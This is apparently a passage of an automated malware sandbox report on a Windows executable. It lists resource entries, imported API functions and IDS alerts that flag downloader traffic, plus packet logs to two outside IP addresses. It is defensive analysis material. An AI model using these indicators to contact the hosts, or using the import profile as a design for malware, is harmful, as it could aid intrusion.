RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x2b94f	data			1.0003417156365715
RT_GROUP_ICON	0xfb108	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xfb180	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xfb194	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xfb1a8	0x14	data	English	Great Britain	1.25
RT_VERSION	0xfb1bc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xfb298	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T03:45:17.137970+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49744	132.226.8.169	80	TCP
2025-01-11T03:45:18.356728+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49744	132.226.8.169	80	TCP
2025-01-11T03:45:18.926350+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49770	104.21.64.1	443	TCP
2025-01-11T03:45:19.809850+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49774	132.226.8.169	80	TCP
2025-01-11T03:45:23.450550+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49788	132.226.8.169	80	TCP
2025-01-11T03:45:24.008171+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49804	104.21.64.1	443	TCP
2025-01-11T03:45:27.781956+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49837	104.21.64.1	443	TCP
2025-01-11T03:45:30.038027+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49854	104.21.64.1	443	TCP
2025-01-11T03:45:32.950520+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49866	132.226.8.169	80	TCP
2025-01-11T03:45:33.951348+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49866	132.226.8.169	80	TCP
2025-01-11T03:45:34.512737+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49880	104.21.64.1	443	TCP
2025-01-11T03:45:36.497397+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49886	132.226.8.169	80	TCP
2025-01-11T03:45:43.614361+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49947	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:45:14.553440094 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:14.558337927 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:14.558439970 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:14.558662891 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:14.563460112 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:15.673197031 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:15.681555986 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:15.686343908 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:17.091970921 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:17.137969971 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:17.187165022 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.187190056 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.187288046 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.239592075 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.239614010 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.709316015 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.709386110 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.730146885 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.730164051 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.730583906 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.778603077 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.858025074 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:17.899334908 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.985843897 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.985928059 CET	443	49759	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:17.985996962 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.020772934 CET	49759	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.024549007 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.029387951 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:18.302985907 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:18.310275078 CET	49770	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.310319901 CET	443	49770	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:18.310383081 CET	49770	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.310841084 CET	49770	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.310857058 CET	443	49770	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:18.356728077 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.769949913 CET	443	49770	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:18.775090933 CET	49770	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.775110960 CET	443	49770	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:18.926372051 CET	443	49770	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:18.926428080 CET	443	49770	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:18.926512957 CET	49770	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.927059889 CET	49770	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:18.933125973 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.934376001 CET	49774	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.938081980 CET	80	49744	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:18.938148975 CET	49744	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.939152956 CET	80	49774	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:18.939237118 CET	49774	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.939347029 CET	49774	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:18.944139957 CET	80	49774	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:19.760684967 CET	80	49774	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:19.762232065 CET	49782	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:19.762283087 CET	443	49782	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:19.762360096 CET	49782	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:19.762681961 CET	49782	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:19.762698889 CET	443	49782	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:19.809849977 CET	49774	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:20.393728018 CET	443	49782	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:20.395389080 CET	49782	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:20.395421982 CET	443	49782	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:20.544774055 CET	443	49782	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:20.544863939 CET	443	49782	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:20.544934034 CET	49782	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:20.547127008 CET	49782	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:20.558788061 CET	49774	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:20.560098886 CET	49788	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:20.563771009 CET	80	49774	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:20.563854933 CET	49774	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:20.564893961 CET	80	49788	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:20.564971924 CET	49788	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:20.565150976 CET	49788	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:20.569879055 CET	80	49788	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:23.405455112 CET	80	49788	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:23.406665087 CET	49804	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:23.406708956 CET	443	49804	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:23.406778097 CET	49804	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:23.407052040 CET	49804	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:23.407066107 CET	443	49804	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:23.450550079 CET	49788	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:23.860810995 CET	443	49804	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:23.866305113 CET	49804	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:23.866333008 CET	443	49804	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:24.008128881 CET	443	49804	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:24.008193016 CET	443	49804	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:24.008275986 CET	49804	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:24.008749962 CET	49804	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:24.013238907 CET	49810	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:24.018012047 CET	80	49810	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:24.018609047 CET	49810	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:24.018806934 CET	49810	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:24.023531914 CET	80	49810	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:25.230333090 CET	80	49810	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:25.231568098 CET	49821	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:25.231591940 CET	443	49821	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:25.231652021 CET	49821	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:25.232333899 CET	49821	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:25.232342005 CET	443	49821	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:25.278697968 CET	49810	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:25.706638098 CET	443	49821	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:25.710501909 CET	49821	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:25.710515976 CET	443	49821	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:25.855098963 CET	443	49821	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:25.855161905 CET	443	49821	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:25.855233908 CET	49821	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:25.855705023 CET	49821	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:25.860142946 CET	49810	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:25.861393929 CET	49826	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:25.865307093 CET	80	49810	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:25.865360975 CET	49810	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:25.866323948 CET	80	49826	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:25.866373062 CET	49826	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:25.866473913 CET	49826	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:25.871180058 CET	80	49826	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:27.044419050 CET	80	49826	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:27.048111916 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.048166990 CET	443	49837	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:27.048377037 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.048829079 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.048846960 CET	443	49837	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:27.091125965 CET	49826	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:27.506774902 CET	443	49837	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:27.560362101 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.667340040 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.667355061 CET	443	49837	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:27.781969070 CET	443	49837	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:27.782032013 CET	443	49837	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:27.782149076 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.783000946 CET	49837	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:27.798542976 CET	49826	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:27.799612045 CET	49842	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:27.803478956 CET	80	49826	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:27.803577900 CET	49826	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:27.804455042 CET	80	49842	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:27.804513931 CET	49842	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:27.804625988 CET	49842	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:27.809428930 CET	80	49842	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:29.423918009 CET	80	49842	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:29.426587105 CET	49854	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:29.426620007 CET	443	49854	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:29.426762104 CET	49854	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:29.428462982 CET	49854	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:29.428472042 CET	443	49854	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:29.466176987 CET	49842	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:29.891335964 CET	443	49854	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:29.893408060 CET	49854	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:29.893435955 CET	443	49854	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:30.038041115 CET	443	49854	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:30.038115978 CET	443	49854	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:30.038243055 CET	49854	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:30.038717031 CET	49854	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:30.088793039 CET	49842	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:30.090132952 CET	49855	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:30.093815088 CET	80	49842	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:30.093882084 CET	49842	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:30.095084906 CET	80	49855	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:30.095211029 CET	49855	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:30.095334053 CET	49855	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:30.100137949 CET	80	49855	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:30.926085949 CET	80	49855	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:30.927831888 CET	49863	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:30.927871943 CET	443	49863	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:30.928009987 CET	49863	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:30.928237915 CET	49863	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:30.928251028 CET	443	49863	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:30.966149092 CET	49855	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:31.290824890 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:31.295870066 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:31.295958042 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:31.296261072 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:31.301117897 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:31.403501987 CET	443	49863	104.21.64.1	192.168.2.11
